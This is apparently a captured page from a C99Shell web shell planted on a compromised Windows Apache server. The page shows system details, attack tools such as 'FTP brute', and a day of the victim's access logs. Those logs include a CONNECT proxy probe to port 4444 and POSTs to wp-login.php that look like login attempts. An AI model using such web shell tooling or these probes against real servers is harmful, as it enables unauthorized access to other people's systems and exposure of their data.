!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 5.02 GB of 239.26 GB (2.1%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     access.2023.04.08.log (512.83 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
216.245.221.92 - - [08/Apr/2023:00:00:32 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:00:00:35 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%207%20del%2008%20de%20Agosto%20de%202012.pdf HTTP/1.1" 200 972955
172.22.2.4 - - [08/Apr/2023:00:01:33 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
172.22.2.4 - - [08/Apr/2023:00:01:42 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=1433&usuario=&sector=&fecha=2019&resuelve= HTTP/1.1" 200 1561
172.22.2.4 - - [08/Apr/2023:00:01:51 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=1433&usuario=&sector=&fecha=2020&resuelve= HTTP/1.1" 200 626
201.245.192.253 - - [08/Apr/2023:00:02:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
35.206.134.101 - - [08/Apr/2023:00:02:42 -0500] "-" 408 -
172.22.2.4 - - [08/Apr/2023:00:01:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
69.171.251.20 - - [08/Apr/2023:00:04:00 -0500] "GET /cerca-de-40-personas-fueron-certificadas-en-proceso-de-formacion-dinamizadores-ambientales-para-el-turismo-en-bogota.html HTTP/1.1" 206 1071
172.22.2.4 - - [08/Apr/2023:00:02:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
69.63.184.116 - - [08/Apr/2023:00:04:24 -0500] "GET /dia-mundial-del-agua-2022-bogota-exalta-el-papel-de-la-educacion-ambiental.html HTTP/1.1" 206 884
172.22.2.4 - - [08/Apr/2023:00:03:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55561
216.245.221.92 - - [08/Apr/2023:00:05:32 -0500] "HEAD / HTTP/1.1" 200 -
66.249.79.100 - - [08/Apr/2023:00:06:37 -0500] "-" 408 -
201.245.192.253 - - [08/Apr/2023:00:07:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
152.61.192.232 - - [08/Apr/2023:00:08:01 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [08/Apr/2023:00:08:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [08/Apr/2023:00:10:32 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:00:09:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59296
201.245.192.253 - - [08/Apr/2023:00:12:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
66.249.79.127 - - [08/Apr/2023:00:13:28 -0500] "-" 408 -
216.245.221.92 - - [08/Apr/2023:00:15:32 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:00:14:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:00:15:53 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=1432&usuario=&sector=&fecha=2020&resuelve= HTTP/1.1" 200 1100
186.179.100.80 - - [08/Apr/2023:00:15:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/1432.pdf HTTP/1.1" 200 539480
199.16.157.180 - - [08/Apr/2023:00:16:01 -0500] "GET /images/Sello%201%20JA-2.jpeg HTTP/1.1" 200 42236
199.16.157.181 - - [08/Apr/2023:00:16:01 -0500] "GET /images/evento-wef-1_optimized.jpeg HTTP/1.1" 200 138129
199.16.157.180 - - [08/Apr/2023:00:16:02 -0500] "GET /secretaria-de-ambiente-impone-sancion-por-puntos-de-obra-sin-permiso-en-el-humedal-tibabuyes.html HTTP/1.1" 200 990
199.16.157.183 - - [08/Apr/2023:00:16:02 -0500] "GET /nuevo-proyecto-en-el-parque-nacional-natural-chingaza-promueve-la-seguridad-hidrica-en-bogota.html HTTP/1.1" 200 834
172.22.2.4 - - [08/Apr/2023:00:14:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57935
201.245.192.253 - - [08/Apr/2023:00:16:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
201.245.192.253 - - [08/Apr/2023:00:20:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42994
201.245.192.253 - - [08/Apr/2023:00:20:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43007
216.245.221.92 - - [08/Apr/2023:00:20:32 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:00:21:28 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=1433&usuario=&sector=&fecha=2020&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [08/Apr/2023:00:21:29 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=1433&usuario=&sector=&fecha=2020&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [08/Apr/2023:00:21:29 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=1433&usuario=&sector=&fecha=2020&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [08/Apr/2023:00:19:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.237 - - [08/Apr/2023:00:21:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/4756.pdf HTTP/1.1" 304 -
172.22.2.4 - - [08/Apr/2023:00:21:37 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=0143&usuario=&sector=&fecha=2020&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [08/Apr/2023:00:21:38 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=0143&usuario=&sector=&fecha=2020&resuelve= HTTP/1.1" 200 626
201.245.192.253 - - [08/Apr/2023:00:21:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [08/Apr/2023:00:20:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52720
62.171.175.68 - - [08/Apr/2023:00:24:33 -0500] "CONNECT 157.90.120.57:4444 HTTP/1.1" 405 941
52.167.144.60 - - [08/Apr/2023:00:24:58 -0500] "GET /portaldeninos/wp-json/pum/v1 HTTP/1.1" 200 766
216.245.221.92 - - [08/Apr/2023:00:25:32 -0500] "HEAD / HTTP/1.1" 200 -
31.13.115.9 - - [08/Apr/2023:00:26:11 -0500] "GET /images/Secretarias%20Fondo%20carga%206%20de%20febrero.jpeg HTTP/1.1" 200 55460
40.77.167.237 - - [08/Apr/2023:00:26:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/0193.pdf HTTP/1.1" 200 395303
201.245.192.253 - - [08/Apr/2023:00:26:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [08/Apr/2023:00:25:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:00:26:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
201.245.192.253 - - [08/Apr/2023:00:30:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42994
201.245.192.253 - - [08/Apr/2023:00:30:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43007
152.61.128.50 - - [08/Apr/2023:00:30:30 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [08/Apr/2023:00:30:32 -0500] "HEAD / HTTP/1.1" 200 -
173.252.83.17 - - [08/Apr/2023:00:31:07 -0500] "GET /images/negocios-verdes-mayo-2022.jpg HTTP/1.1" 200 48000
201.245.192.253 - - [08/Apr/2023:00:31:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [08/Apr/2023:00:31:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:00:32:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
216.245.221.92 - - [08/Apr/2023:00:35:32 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [08/Apr/2023:00:36:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [08/Apr/2023:00:37:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:00:38:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
201.245.192.253 - - [08/Apr/2023:00:40:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42994
201.245.192.253 - - [08/Apr/2023:00:40:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43007
216.245.221.92 - - [08/Apr/2023:00:40:32 -0500] "HEAD / HTTP/1.1" 200 -
66.249.79.97 - - [08/Apr/2023:00:40:42 -0500] "-" 408 -
201.245.192.253 - - [08/Apr/2023:00:41:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
186.84.91.80 - - [08/Apr/2023:00:42:09 -0500] "GET /semana-santa-dias-y-horarios-para-visitar-el-camino-guadalupe-aguanoso.html?fbclid=IwAR0b-H0wtvxPGuR74xo4iciAVEOYb08VQHrgDxXFDFfzBLKpoR7WHoqBQd0 HTTP/1.1" 200 943
172.22.2.4 - - [08/Apr/2023:00:43:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [08/Apr/2023:00:45:32 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:00:44:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52720
152.61.192.232 - - [08/Apr/2023:00:46:34 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.192.232 - - [08/Apr/2023:00:46:35 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.192.232 - - [08/Apr/2023:00:46:35 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
201.245.192.253 - - [08/Apr/2023:00:46:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [08/Apr/2023:00:47:18 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/Analisis%20jurisprudencial%20Sentencia%20C-366-11.doc HTTP/1.1" 200 59392
66.249.79.127 - - [08/Apr/2023:00:48:28 -0500] "-" 408 -
172.22.2.4 - - [08/Apr/2023:00:47:13 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 62202
172.22.2.4 - - [08/Apr/2023:00:49:49 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
186.155.14.138 - - [08/Apr/2023:00:50:02 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
186.155.14.138 - - [08/Apr/2023:00:50:02 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
186.155.14.138 - - [08/Apr/2023:00:50:02 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
216.245.221.92 - - [08/Apr/2023:00:50:32 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:00:49:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.31.57.93 - - [08/Apr/2023:00:51:10 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18MP9DSDGUdpgXCiI+2dmCTSReNrw0udzST6bbvYWLF9CJgxuXIXb+t8bDZPsY0v9v/0Di1PxG1ilvlPmi1fxl7zOg1XqlM3Xo2IuASt/tr1NFfms/zH3NjlEk3HPqejwg2MMWTjrvtXObSddh7zn0Fgi5dUb6xaAIpovcxPFlM4eEaEqA5/yeTlRv0g2AcCEI2AGVIqEutnxZXqPsktgAWH4t8SIXP+nNXjkwFb2smZpJDteYD6w8HE9c6m/dmoZulNKxZN6X/Ag==&u=U2FsdGVkX19aXwyWaNLP78SCcohjs2yFRgsfI1fUPMMraHgPiRcsr79gixFrMFqn&y=U2FsdGVkX19xKCdf46QT8i1RKNo0IcOEqKsUonrRgP/R/HXFox2Zlg+SoRXPD/F2 HTTP/1.1" 200 26
186.31.57.93 - - [08/Apr/2023:00:51:11 -0500] "GET /kwssiamovil/sm/acme/a?s=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&u=U2FsdGVkX19aXwyWaNLP78SCcohjs2yFRgsfI1fUPMMraHgPiRcsr79gixFrMFqn&y=U2FsdGVkX19xKCdf46QT8i1RKNo0IcOEqKsUonrRgP/R/HXFox2Zlg+SoRXPD/F2 HTTP/1.1" 200 26
186.31.57.93 - - [08/Apr/2023:00:51:11 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18+GTRyKYL7mJvJOd7DXJ96k6s+3cBrQKspmseQH9D7UE4AunvEq5y2wxchwhxy37HEvAmJ1AzrCcLil4oH4LVn7+/I2MjXTWbHGzViWmIjJ1EjAJll+v8onXNdSMr2Lapx9WbI67emd/W7Rosco7xS7DFAtv9g9Bc=&u=U2FsdGVkX19aXwyWaNLP78SCcohjs2yFRgsfI1fUPMMraHgPiRcsr79gixFrMFqn&y=U2FsdGVkX19xKCdf46QT8i1RKNo0IcOEqKsUonrRgP/R/HXFox2Zlg+SoRXPD/F2 HTTP/1.1" 200 26
186.31.57.93 - - [08/Apr/2023:00:51:11 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19BIcTFV54U2t08Yb35qfNHDyhKqa0Lu6PuihQTcttMdV2Hv4lPexSJZ17wwhLVLIX+Ib6kZcZCPZaUSahGX7PQQUXuESKzWN5083rPH+bpXztn0CGIVrGZTHrQqf1oRC0nxDZGMj4AAbb6Sh7k0li8TOMyIqrf1EI=&u=U2FsdGVkX19aXwyWaNLP78SCcohjs2yFRgsfI1fUPMMraHgPiRcsr79gixFrMFqn&y=U2FsdGVkX19xKCdf46QT8i1RKNo0IcOEqKsUonrRgP/R/HXFox2Zlg+SoRXPD/F2 HTTP/1.1" 200 26
186.31.57.93 - - [08/Apr/2023:00:51:11 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18Bs3utaFgwy4LXhIZrn3OvwkvOx2lbifvqe4aCL9ydfCqWh/TVtGRRUA2zhJaqLROm11FnLw3mcoINwzSs70DGSUzeozYtCP9q0RUqZaN657IJjEJa7oj32XjDtNYfnZIWK5LkXF/r5Uh5UiZ+caHO6IkcTxUvczg=&u=U2FsdGVkX19aXwyWaNLP78SCcohjs2yFRgsfI1fUPMMraHgPiRcsr79gixFrMFqn&y=U2FsdGVkX19xKCdf46QT8i1RKNo0IcOEqKsUonrRgP/R/HXFox2Zlg+SoRXPD/F2 HTTP/1.1" 200 26
186.31.57.93 - - [08/Apr/2023:00:51:12 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19kQnNVzYiPD/I5TGDMWjI6f7KagRVU+dunjDXz7UbMsvwkWe5xEJk83w4DbIzSYLmsVtOWERkWEXw4RoEXz3N7Qqtyy4gNPKnKxJrnmaloiaIbJ3K7UbBFrVbDkJC0mth99T/YnJst0Ai9SOUxPhAWQueMWdXoT7cn8I3LYUM04QmRPdO2eaYuprOQ6M/0U4vzGUpgaLNkKA==&u=U2FsdGVkX19aXwyWaNLP78SCcohjs2yFRgsfI1fUPMMraHgPiRcsr79gixFrMFqn&y=U2FsdGVkX19xKCdf46QT8i1RKNo0IcOEqKsUonrRgP/R/HXFox2Zlg+SoRXPD/F2 HTTP/1.1" 200 26
162.55.175.144 - - [08/Apr/2023:00:51:17 -0500] "GET / HTTP/1.1" 200 4720
162.55.175.144 - - [08/Apr/2023:00:51:20 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [08/Apr/2023:00:49:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57935
52.167.144.36 - - [08/Apr/2023:00:51:39 -0500] "GET /BLA/resoluciones/AUTOS%202022/2007.pdf HTTP/1.1" 304 -
201.245.192.253 - - [08/Apr/2023:00:51:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
40.77.167.231 - - [08/Apr/2023:00:52:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4097.pdf HTTP/1.1" 200 351989
172.22.2.4 - - [08/Apr/2023:00:53:09 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/Analisis%20jurisprudencial%20Sentencia%20C-366-11.doc HTTP/1.1" 200 59392
172.22.2.4 - - [08/Apr/2023:00:53:10 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1038
172.22.2.4 - - [08/Apr/2023:00:53:10 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1038
172.22.2.4 - - [08/Apr/2023:00:53:10 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1038
172.22.2.4 - - [08/Apr/2023:00:53:10 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1038
172.22.2.4 - - [08/Apr/2023:00:53:10 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1038
172.22.2.4 - - [08/Apr/2023:00:53:10 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1038
172.22.2.4 - - [08/Apr/2023:00:53:10 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1038
172.22.2.4 - - [08/Apr/2023:00:53:10 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1038
172.22.2.4 - - [08/Apr/2023:00:53:10 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1038
172.22.2.4 - - [08/Apr/2023:00:53:10 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1038
40.77.167.186 - - [08/Apr/2023:00:54:11 -0500] "GET /portaldeninos/2021/02/05/la-virtualidad-una-oportunidad-para-que-mas-personas-conozcan-e-interactuen-con-los-ecosistemas-y-la-biodiversidad-de-bogota/ HTTP/1.1" 200 109801
216.245.221.92 - - [08/Apr/2023:00:55:32 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:00:54:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [08/Apr/2023:00:56:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
185.119.81.103 - - [08/Apr/2023:00:57:14 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.103 - - [08/Apr/2023:00:57:15 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [08/Apr/2023:00:55:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
131.72.137.235 - - [08/Apr/2023:00:59:12 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-el-inicio-de-la-tercera-fase.html HTTP/1.1" 200 954
52.167.144.89 - - [08/Apr/2023:00:59:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5539.pdf HTTP/1.1" 200 450378
216.245.221.92 - - [08/Apr/2023:01:00:32 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:01:00:50 -0500] "GET /BLA/boletinlegal/Directivas/2011/Directiva%20No.%2010%20del%2028%20de%20Septiembre%20de%202011.pdf HTTP/1.1" 200 465887
201.245.192.253 - - [08/Apr/2023:01:01:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [08/Apr/2023:01:00:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
46.248.187.40 - - [08/Apr/2023:01:02:35 -0500] "-" 408 -
172.22.2.4 - - [08/Apr/2023:01:01:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55924
216.245.221.92 - - [08/Apr/2023:01:05:32 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [08/Apr/2023:01:06:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
52.167.144.89 - - [08/Apr/2023:01:06:56 -0500] "GET /forest/ HTTP/1.1" 200 12041
34.91.245.43 - - [08/Apr/2023:01:07:43 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
173.252.83.15 - - [08/Apr/2023:01:07:51 -0500] "GET /galeria/galeria/fotos/4humedal-Burro4P.jpg HTTP/1.1" 200 7980
172.22.2.4 - - [08/Apr/2023:01:06:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
162.55.175.158 - - [08/Apr/2023:01:08:45 -0500] "GET / HTTP/1.1" 200 319
162.55.175.158 - - [08/Apr/2023:01:08:45 -0500] "GET / HTTP/1.1" 200 4720
66.249.70.168 - - [08/Apr/2023:01:09:03 -0500] "GET /camino-guadalupe-aguanoso-abierto-de-nuevo-al-publico.html HTTP/1.1" 200 879
172.22.2.4 - - [08/Apr/2023:01:07:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55211
216.245.221.92 - - [08/Apr/2023:01:10:31 -0500] "HEAD / HTTP/1.1" 200 -
66.249.79.97 - - [08/Apr/2023:01:10:33 -0500] "-" 408 -
40.77.167.141 - - [08/Apr/2023:01:11:35 -0500] "GET /BLA/resoluciones/AUTOS%202022/6055.pdf HTTP/1.1" 200 472850
201.245.192.253 - - [08/Apr/2023:01:11:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
40.77.167.231 - - [08/Apr/2023:01:12:20 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12500
152.61.128.50 - - [08/Apr/2023:01:13:03 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.128.50 - - [08/Apr/2023:01:13:04 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.128.50 - - [08/Apr/2023:01:13:04 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
40.77.167.237 - - [08/Apr/2023:01:13:48 -0500] "GET /SIIPEV/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Registros/RegistrosOtorgados.html HTTP/1.1" 200 728881
172.22.2.4 - - [08/Apr/2023:01:12:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.237 - - [08/Apr/2023:01:14:19 -0500] "GET /SIIPEV/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Registros/css/dataTables.bootstrap.css HTTP/1.1" 200 7679
40.77.167.237 - - [08/Apr/2023:01:14:19 -0500] "GET /SIIPEV/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Registros/js/bootstrap.min.js HTTP/1.1" 200 35601
40.77.167.231 - - [08/Apr/2023:01:14:20 -0500] "GET /SIIPEV/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Registros/js/dataTables.bootstrap.js HTTP/1.1" 200 4287
157.55.39.224 - - [08/Apr/2023:01:14:24 -0500] "GET /SIIPEV/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Registros/js/jquery.min.js HTTP/1.1" 200 95786
52.167.144.89 - - [08/Apr/2023:01:14:25 -0500] "GET /SIIPEV/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Registros/css/bootstrap.min.css HTTP/1.1" 200 113504
40.77.167.141 - - [08/Apr/2023:01:14:28 -0500] "GET /SIIPEV/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Registros/js/jquery.dataTables.min.js HTTP/1.1" 200 78766
172.22.2.4 - - [08/Apr/2023:01:14:28 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20ANALISIS%20SENTENCIA%20T-411%20DE%201992.doc HTTP/1.1" 200 41984
172.22.2.4 - - [08/Apr/2023:01:13:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54414
216.245.221.92 - - [08/Apr/2023:01:15:32 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.89 - - [08/Apr/2023:01:15:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/3836.pdf HTTP/1.1" 304 -
201.245.192.253 - - [08/Apr/2023:01:16:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
